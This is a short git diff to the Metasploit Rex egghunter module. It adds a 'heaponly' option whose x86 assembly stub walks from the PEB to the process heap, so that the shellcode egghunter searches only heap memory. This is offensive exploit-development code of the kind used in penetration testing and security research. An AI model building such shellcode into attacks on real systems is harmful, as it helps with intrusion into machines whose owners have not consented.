diff --git a/lib/rex/exploitation/egghunter.rb b/lib/rex/exploitation/egghunter.rb
index 3155db3662..509837f334 100644
--- a/lib/rex/exploitation/egghunter.rb
+++ b/lib/rex/exploitation/egghunter.rb
@@ -23,6 +23,7 @@ module Exploitation
 # Startreg code added by corelanc0d3r
 # Added routine to disable DEP for discovered egg (for win, added by corelanc0d3r)
 # Added support for searchforward option (true or false)
+# Added support for heap-only search option (true or false)
 #
 ###
 class Egghunter
@@ -58,6 +59,11 @@ class Egghunter
           else
             startstub = "\n\tjmp next_addr"
           end
+        # search only in heap?
+        elsif opts[:heaponly]
+          startstub  = "\n\tpush 0x30\n\tpop edx\n\tmov edx,fs:[edx]"
+          startstub << "\n\tadd dl,0x90\n\tmov edx,[edx]"
+          startstub << "\n\tmov edx,[edx]\n\tjmp next_addr"
         end
         startstub << "\n\t" if startstub.length > 0